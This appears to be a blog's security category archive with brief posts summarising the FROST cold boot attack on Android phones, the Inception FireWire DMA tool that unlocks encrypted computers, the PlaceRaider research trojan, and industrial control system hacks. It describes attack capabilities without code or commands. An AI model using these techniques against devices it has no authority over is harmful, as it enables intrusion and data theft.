Category Archives: Security

FROST: Forensic Recovery Of Scrambled Telephones

A ready to go cold boot attack for a Galaxy Nexus!
Your Android PIN does not protect you.

We present FROST, a tool set that supports the forensic recovery of scrambled telephones. To this end we perform cold boot attacks against Android smartphones and retrieve disk encryption keys from RAM. We show that cold boot attacks against Android phones are generally possible for the first time, and we perform our attacks practically against Galaxy Nexus devices from Samsung. To break disk encryption, the bootloader must be unlocked before the attack because scrambled user partitions are wiped during unlocking. However, we show that cold boot attacks are more generic and allow to retrieve sensitive information, such as contact lists, visited web sites, and photos, directly from RAM, even though the bootloader is locked.

Link.

Tagged , , , , , , , ,

Military IRC

Apparently the US Military uses IRC in a command and control context.
This was a big surprise to me!

A 2006 thesis from the Naval Postgraduate School states that internet relay chat (IRC) is one of the most widely used chat protocols for military command and control (C2). Software such as mIRC, a Windows-based chat client, or integrated systems in C2 equipment are used primarily in tactical conditions though efforts are underway to upgrade systems to newer protocols.

Tagged , , , , , ,

Breaking Full-Disk Encryption Using FireWire

There have been a number of proof-of-concept hacks using IEEE1394 devices’ DMA to elevate privileges on a host machine.
The most useful application of this technique is breaking into machines that use full-disk encryption. Now there is a tool that will run from any Unix-Like host (Linux, OSX) and can unlock Windows XP,Vista,7,8,OSX 10.6,10.7,10.8, Ubuntu on both x86 and x64 hosts.

Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost any machine you have physical access to.

It is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption. Inception is also useful for incident response teams and digital forensics experts when faced with live machines.

Link.

Tagged , , , , , , ,

Android malware designed to build 3-D models of users’ apartments

An interesting article at FastCompany about PlaceRaider, an experimental smartphone trojan designed by Indiana University and the U.S. Navy. It’s Android malware designed to build 3-D models of users’ apartments.

PlaceRaider, which was summarized in a recent arXiv paper, is a piece of “visual malware” which smartphone cameras, accelerometers, and gyroscopes, to reconstruct victims’ rooms and offices. As pictures are uploaded onto the central server, they are knitted together into a 3D model of the indoor location where the pics were taken.

Tagged , , , , ,

Rise of “forever day” bugs in industrial systems

Arstechnica has an interesting article examining the effect of unpatched vulnerabilities in industrial control systems.
Specific mention is made of an exploit allowing remote code execution on robots using some old ABB software.

According to an advisory (PDF) issued last week by the US Cyber Emergency Response Team, the flaw in ABB WebWare Server won’t be fixed even though it provides the means to remotely execute malicious code on computers that run the application.

Link.

Tagged , , , , , ,

SCADA Hack Destroys Mains Water Pump

“Hackers gained remote access into the control system of the city water utility in Springfield, Illinois, and destroyed a pump last week, according to a report released by a state fusion center and obtained by a security expert.”
Link.

Tagged , ,